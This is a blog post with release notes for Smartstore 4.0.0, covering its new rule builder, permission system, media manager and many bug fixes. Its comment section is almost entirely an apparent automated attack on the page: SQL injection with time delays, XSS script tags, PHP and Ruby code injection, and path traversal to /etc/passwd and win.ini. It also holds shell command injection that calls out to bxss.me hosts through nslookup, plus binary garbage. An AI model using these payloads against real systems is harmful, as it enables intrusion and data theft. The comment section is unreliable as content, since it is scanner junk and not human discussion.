Friday, June 26, 2020
Smartstore 4.0.0 is available
Highlights
- (NEW) Media Manager: Powerful and lightning-fast explorer/manager for media files (commercial plugin exclusively bundled with Pro Edition)
- (NEW) Rule Builder: Powerful rule system for visual business rule creation
- Dozens of predefined rules out-of-the-box
- Supports logical operators (AND/OR) and unlimited grouping/nesting
- Cart rules: can be applied to discounts, shipping and payment methods
- Customer rules: used to auto-assign customers to customer groups for 1-to-1 content targeting
- Product rules: used to auto-assign products to categories based on filter definitions (e.g. price, brand, color, stock etc.)
- (NEW) New permission (ACL) system: Granular tree-based permission management based on customer groups. Supports inheritance to allow or deny entire permission ranges
- (NEW) Personalized product recommendations: Replaces homepage products dynamically with personalized product recommendations based on customer interests. (commercial plugin)
- (NEW) Geo Blocker: Restricts shop access based on visitor country or IP address ranges (commercial plugin)
- (NEW) Dashboard with charts: New dashboard widgets display key data like orders, customers, bestsellers etc. in nice graphical charts.
Breaking changes
- (Dev) Install\UninstallPermissions has been removed from IPermissionService. No longer needs to be called by plugins. Permissions are now automatically installed\uninstalled.
- (Dev) IDiscountRequirementRule and IShippingMethodFilter has been removed. Discounts and shipping methods can now be filtered by rule sets.
- (Dev) Customer navigation property CustomerRoles has been replaced by CustomerRoleMappings, a new entity for role mappings.
- The search index must be rebuilt due to various enhancements.
- (Dev) The wrong name of API endpoint LocalizedPropertys has been corrected and renamed to LocalizedProperties.
New Features
- Granular permissions: All permissions of a customer directly visible on the customer edit page.
- DEV: Added Visual Studio extension to create Smartstore Plugins
- GDPR conform Cookie Consent Manager
- SEO: XML Sitemap now includes blog, news and forum
- SEO: do 301 redirect to URL without trailing slash
- SVG support for image uploads.
- Schedule tasks: new property "Priority" runs tasks with higher priority first when multiple tasks are pending.
- Added XML Sitemap settings to backend UI.
- Add published property to ProductTag entity.
- Apply percentage discounts also on tier prices.
- Implement ACL and multistore capability on menu item level.
- Menu Builder items: implement support for icon (brand) color.
- Show bundle item images in order details like in shopping cart details.
- MegaSearch:
- Added more text analysis options (e.g. Lucene.Net classic analyzer).
- Added tool to display internal information about a search, such as Lucene.Net terms.
- Find the grouped product when searching for the SKU, GTIN, MPN of a non individually visible, associated product.
- Find product when searching for GTIN or MPN of an attribute combination.
- Perf. Added option to ignore attribute filtering property on product level.
- Web-API:
- Added a parameter to start an import after uploading import files.
- Added endpoints for ProductPictures, ProductCategories and ProductManufacturers to allow updating DisplayOrder.
- Added endpoints for NewsLetterSubscription.
- Direct links to variations on a product.
- Add ability to hide products from catalog, but not search.
- Implement hidden boolean setting that controls which catalog search engine implementation should be used in backend.
- Enable images and color values for search filters to be stored for specification attribute options.
- Add field for manufacturer bottom description like for categories.
- Add new field for product condition.
- ACL support for manufacturers.
- Add new field for tracking URL to shipment entity to better track shipments.
- (Page Builder) Added a Page Builder block to display blog posts.
Improvements
- Make MeasureDimension and MeasureWeight localizable.
- Show an example currency value for custom formatting value changes.
- Card desk instead of a grid for customer addresses on customer edit page.
- Display "price from" in product lists if any attribute combination price exists.
- Reworked blog & news section.
- Activated ReCaptcha without keys can cause the merchant to lock himself out of the shop.
- Export: let a provider directly export to a file stream instead of a memory stream.
- Topic editor should display all menu item nodes that reference the current topic.
- UI: ACL, discount and store selection should be done via multiple select2.
- Updated UserAgent Parser.
- TinyImage: updated WebP detection patterns.
- PayPal PLUS:
- Apply order of payment methods in backend to the list of third-party payment methods in checkout.
- Send the billing address when redirecting to PayPal.
- Hide cart payment button for payment methods without match of applied rule sets.
- MegaSearch: Support exact value match for numeric range filters.
- Hide option prizes if "Call for price" is enabled.
- Debitoor: added an option to force a price type on invoices.
- BeezUp: export product costs.
- RTL: fixed alignment of product art badge.
- Sending of mails to customers uses generic message template now.
- UI: Added XmlSitemap settings to backend
- And many more other minor improvements
Bugfixes
- Export: Fixed KeyNotFoundException when batch size was 1.
- Fixed KeyNotFoundException when payment method friendly name ends with spaces.
- Cart: Fixed ShoppingCartSettings.ShowProductBundleImagesOnShoppingCart hides the bundle item name.
- MegaSearch:
- Fixed the preset sorting order of products on a manufacturer page may be wrong depending on catalog settings.
- Price facet filter bypasses Call for Pricing and shows the approximate price of a product.
- The number of hits for product review facets was wrong in some cases.
- Do not show facets for manufacturers or categories if they are limited to stores or subject to ACL.
- Ghost facet filter groups will appear if a numeric value is assigned that matches to a different spec option.
- Page Builder:
- Block with z-index < 0 can not be selected in story view - Block tools can reduce z-index below 0.
- Manually editing/removing block cols/rows does not refresh grid state correctly.
- Edit Mode rendering bug in Mac Safari
- Added "Order" property to page Builder block to control rendering order of blocks in HTML output
- PayPal:
- Fixed rare exception "Unsupported Media Type" (415) in PayPal PLUS.
- Only process a partially refund IPN when the order refunded amount is zero. Otherwise the order refunded amount will be wrong.
- Customer import:
- VatNumber and other fields were ignored.
- Customer roles sometimes inserted several times.
- Changed billing/shipping address was added instead of updating the existing one.
- Region assigned to an address was not updated.
- Product tags:
- Product tag count should filter also based on Visibility.
- Product tag count sometimes not up-to-date due to missing cache clearance.
- Debitoor:
- Avoid errors due to invalid quantity unit Id of 0.
- rework quantity units.
- Sometimes the SKU was missing on invoices.
- Multistore mapping was ignored for manufacturers in sitemap.
- Categories limited to stores were not displayed in tree view.
- Fixed InvalidOperationException in CreatePdfInvoiceAttachment when an order is placed by a guest.
- The ShowDescriptionInSubPages setting should also be applied to the bottom category description.
- Recaptcha: doesn't work for product reviews, blog and news comments if hidden captcha is activated.
- Customer FullName is not populated after registration.
- Web-API: fixed authentication error "Value cannot be null. Parameter name: name" when login type is email.
- Payone: fixed wrong hash value if redirecting option is activated.
- Azure: opening the configuration page resulted in an error.
- Shipping by weight: the surcharge hint was not displayed correctly.
- Off-canvas menu shows wrong product count for brand menu items.
- Images of newly added variants could be deleted automatically due to wrong image transient state.
- Menu display order is ignored for widget zone header_menu_special_after.
- RTL: Manage categories tree view.
- Biz-Importer: If the TaxRate table was missing, the assignment of the tax category to the product was not set.
- Import: adding URL records requires cache to be cleared.
- The order list summary do not respect all list filters and shows wrong aggregate values.
- Removing gift card issue.
- A delivery time cannot be deleted if it is assigned to a variant combination of a deleted product.
- BeezUp: fixes ArgumentNullException, parameter name "source".
- Avoid redirecting to the account activation page when trying to log in for the first time.
- The checkout button disappears when moving a product from the shopping cart to the wishlist.
- Menu builder: in case of system menus the template can changes accidentally when saving.
- Structured data: Replace length with depth property.
- 'View All' button from the offcanvas manufacturer menu causes 404 on mobile.
- Added missing sitemap task.
- ESD: browser freezes when editing file changelog
- And many more other minor fixes...
Comments (154)
Mr.
1'"
Mr.
\
Mr.
1����%2527%2522
Mr.
@@SzKHF
Mr.
JyI=
Mr.
�'�"
Mr.
�''�""
Mr.
LtC3twNa
Mr.
1*
Mr.
1*
Mr.
1*
Mr.
1*
Mr.
-1 OR 2+612-612-1=0+0+0+1 --
Mr.
-1 OR 3+612-612-1=0+0+0+1 --
Mr.
-1 OR 2+895-895-1=0+0+0+1
Mr.
-1 OR 3+895-895-1=0+0+0+1
Mr.
725'
Mr.
if(now()=sysdate(),sleep(12),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z
Mr.
(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/
Mr.
-1; waitfor delay '0:0:12' --
Mr.
-1); waitfor delay '0:0:12' --
Mr.
-1)); waitfor delay '0:0:12' --
Mr.
../../../../../../../../../../etc/passwd
Mr.
1 waitfor delay '0:0:12' --
Mr.
nV3jiLDS'; waitfor delay '0:0:12' --
Mr.
../../../../../../../../../../windows/win.ini
Mr.
../
Mr.
./
Mr.
PklSCDbr'); waitfor delay '0:0:12' --
Mr.
FlbVkvxM')); waitfor delay '0:0:12' --
Mr.
-5 OR 750=(SELECT 750 FROM PG_SLEEP(12))--
Mr.
-5) OR 604=(SELECT 604 FROM PG_SLEEP(12))--
Mr.
-1)) OR 797=(SELECT 797 FROM PG_SLEEP(12))--
Mr.
DODlvPzJ' OR 502=(SELECT 502 FROM PG_SLEEP(12))--
Mr.
a6b30AnO') OR 626=(SELECT 626 FROM PG_SLEEP(12))--
Mr.
4FAxzzAQ')) OR 463=(SELECT 463 FROM PG_SLEEP(12))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12)
Mr.
HttP://bxss.me/t/xss.html?%00
Mr.
bxss.me/t/xss.html?%00
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12)||'
Mr.
;print(md5(31337));
Mr.
';print(md5(31337));$a='
Mr.
";print(md5(31337));$a="
Mr.
${@print(md5(31337))}
Mr.
${@print(md5(31337))}\
Mr.
'.print(md5(31337)).'
Mr.
${9999568+9999780}
Mr.
)
Mr.
!(()&&!|*|*|
Mr.
^(#$!@#$)(()))******
Mr.
echo thuhxy$()\ cbumce\nz^xyu||a #' &echo thuhxy$()\ cbumce\nz^xyu||a #|" &echo thuhxy$()\ cbumce\nz^xyu||a #
Mr.
&echo ucuwjn$()\ ruxepk\nz^xyu||a #' &echo ucuwjn$()\ ruxepk\nz^xyu||a #|" &echo ucuwjn$()\ ruxepk\nz^xyu||a #
Mr.
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
Mr.
1some_inexistent_file_with_long_name.jpg
Mr.
Http://bxss.me/t/fit.txt
Mr.
http://bxss.me/t/fit.txt?.jpg
Mr.
bxss.me
Mr.
|echo eekkit$()\ ufxhtn\nz^xyu||a #' |echo eekkit$()\ ufxhtn\nz^xyu||a #|" |echo eekkit$()\ ufxhtn\nz^xyu||a #
Mr.
(nslookup hitbuywgbgwsk5f9af.bxss.me||perl -e "gethostbyname('hitbuywgbgwsk5f9af.bxss.me')")
Mr.
$(nslookup hitozqrtragoje9085.bxss.me||perl -e "gethostbyname('hitozqrtragoje9085.bxss.me')")
Mr.
&(nslookup hitgureluavlt8e1a8.bxss.me||perl -e "gethostbyname('hitgureluavlt8e1a8.bxss.me')")&'\"`0&(nslookup hitgureluavlt8e1a8.bxss.me||perl -e "gethostbyname('hitgureluavlt8e1a8.bxss.me')")&`'
Mr.
|(nslookup hitvroqnnjfgnd2656.bxss.me||perl -e "gethostbyname('hitvroqnnjfgnd2656.bxss.me')")
Mr.
`(nslookup hitxumhjychzgd03e2.bxss.me||perl -e "gethostbyname('hitxumhjychzgd03e2.bxss.me')")`
Mr.
;(nslookup hittwlcfgqanw008ab.bxss.me||perl -e "gethostbyname('hittwlcfgqanw008ab.bxss.me')")|(nslookup hittwlcfgqanw008ab.bxss.me||perl -e "gethostbyname('hittwlcfgqanw008ab.bxss.me')")&(nslookup hittwlcfgqanw008ab.bxss.me||perl -e "gethostbyname('hittwlcfgqanw008ab.bxss.me')")
Mr.
smartstore-4-0-0-is-available
Mr.
smartstore-4-0-0-is-available
Mr.
smartstore-4-0-0-is-available/.
Mr.
'"()&%
Mr.
'"()&%
Mr.
9992369
Mr.
acu4504<s1﹥s2ʺs3ʹuca4504
Mr.
acux8188��z1��z2a�bcxuca8188
Mr.
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)�x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
Mr.
{{49767*50145}}
Mr.
IpT>
Mr.
<ScRiPt
>iVjI(9838)
Mr.
<form><hr><label>This is a searchable index. Enter search keywords: <input name="isindex" type="image" src="1"></label><hr></form>
Mr.
<img src="//xss.bxss.me/t/dot.gif">
Mr.
<img src="xyz">
Mr.
<img src=">">
Mr.
%0D%0A%3C%53%63%52%69%50%74%20%3E%69%56%6A%49%289681%29%3C%2F%73%43%72%69%70%54%3E
Mr.
\u003CScRiPt\iVjI(9566)\u003C/sCripT\u003E
Mr.
<ScRiPt>iVjI(9033)</sCripT>
Mr.
�<img>
Mr.
<input>
Mr.
<a href="http://xss.bxss.me"></a>
Mr.
<a></a>
Mr.
[url=http://xss.bxss.me][/url]
Mr.
}body{acu:Expre/**/SSion(iVjI(9498))}
Mr.
<% contenteditable onresize=iVjI(9059)>
Mr.
TjBhl
Mr.
response.write(9441955*9703014)
Mr.
'+response.write(9441955*9703014)+'
Mr.
"+response.write(9441955*9703014)+"
Mr.
echo kwjqla$()\ rzgdth\nz^xyu||a #' &echo kwjqla$()\ rzgdth\nz^xyu||a #|" &echo kwjqla$()\ rzgdth\nz^xyu||a #
Mr.
&echo wubytf$()\ iqsvea\nz^xyu||a #' &echo wubytf$()\ iqsvea\nz^xyu||a #|" &echo wubytf$()\ iqsvea\nz^xyu||a #
Mr.
|echo hbqnbi$()\ lpjgmr\nz^xyu||a #' |echo hbqnbi$()\ lpjgmr\nz^xyu||a #|" |echo hbqnbi$()\ lpjgmr\nz^xyu||a #
Mr.
(nslookup hitviuqihexfxacec5.bxss.me||perl -e "gethostbyname('hitviuqihexfxacec5.bxss.me')")
Mr.
$(nslookup hitylivqzasts4e364.bxss.me||perl -e "gethostbyname('hitylivqzasts4e364.bxss.me')")
Mr.
&(nslookup hitdhudjccgck79de4.bxss.me||perl -e "gethostbyname('hitdhudjccgck79de4.bxss.me')")&'\"`0&(nslookup hitdhudjccgck79de4.bxss.me||perl -e "gethostbyname('hitdhudjccgck79de4.bxss.me')")&`'
Mr.
|(nslookup hitmcnrgkvzoo8ca1e.bxss.me||perl -e "gethostbyname('hitmcnrgkvzoo8ca1e.bxss.me')")
Mr.
`(nslookup hitwrhyyuwgrh18cb4.bxss.me||perl -e "gethostbyname('hitwrhyyuwgrh18cb4.bxss.me')")`
Mr.
;(nslookup hitihfflxtztoa7df3.bxss.me||perl -e "gethostbyname('hitihfflxtztoa7df3.bxss.me')")|(nslookup hitihfflxtztoa7df3.bxss.me||perl -e "gethostbyname('hitihfflxtztoa7df3.bxss.me')")&(nslookup hitihfflxtztoa7df3.bxss.me||perl -e "gethostbyname('hitihfflxtztoa7df3.bxss.me')")
Mr.
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Mr.
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
Mr.
Http://bxss.me/t/fit.txt
Mr.
http://bxss.me/t/fit.txt?.jpg
Mr.
/etc/shells
Mr.
c:/windows/win.ini
Mr.
bxss.me
Mr.
-1 OR 2+501-501-1=0+0+0+1 --
Mr.
-1 OR 3+501-501-1=0+0+0+1 --
Mr.
-1 OR 2+28-28-1=0+0+0+1
Mr.
-1 OR 3+28-28-1=0+0+0+1
Mr.
-1' OR 2+810-810-1=0+0+0+1 --
Mr.
-1' OR 3+810-810-1=0+0+0+1 --
Mr.
-1' OR 2+995-995-1=0+0+0+1 or 'jCIxutzV'='
Mr.
'.gethostbyname(lc('hitik'.'unmjgjlh5d457.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(89).chr(117).chr(66).'
Mr.
-1' OR 3+995-995-1=0+0+0+1 or 'jCIxutzV'='
Mr.
-1" OR 2+821-821-1=0+0+0+1 --
Mr.
".gethostbyname(lc("hitub"."csvwsevx511bc.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(72).chr(99).chr(68)."
Mr.
-1" OR 3+821-821-1=0+0+0+1 --
Mr.
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
Mr.
';print(md5(31337));$a='
Mr.
";print(md5(31337));$a="
Mr.
${@print(md5(31337))}
Mr.
${@print(md5(31337))}\
Mr.
'.print(md5(31337)).'
Mr.
"+"A".concat(70-3).concat(22*4).concat(100).concat(70).concat(109).concat(72)+(require"socket"
Socket.gethostbyname("hitlt"+"bnryflex71119.bxss.me.")[3].to_s)+"
Mr.
'+'A'.concat(70-3).concat(22*4).concat(118).concat(89).concat(113).concat(89)+(require'socket'
Socket.gethostbyname('hitfq'+'mvnhmets2f4ab.bxss.me.')[3].to_s)+'
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
UHDPmPwt'; waitfor delay '0:0:15' --
Mr.
j5bmZF1e'); waitfor delay '0:0:15' --
Mr.
LIJiJW23')); waitfor delay '0:0:15' --
Mr.
-5 OR 197=(SELECT 197 FROM PG_SLEEP(15))--
Mr.
-5) OR 317=(SELECT 317 FROM PG_SLEEP(15))--
Mr.
-1)) OR 527=(SELECT 527 FROM PG_SLEEP(15))--
Mr.
BotG2nn4' OR 527=(SELECT 527 FROM PG_SLEEP(15))--
Mr.
Om1Dt7hV') OR 840=(SELECT 840 FROM PG_SLEEP(15))--
Mr.
HfUeJXfX')) OR 134=(SELECT 134 FROM PG_SLEEP(15))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@okF95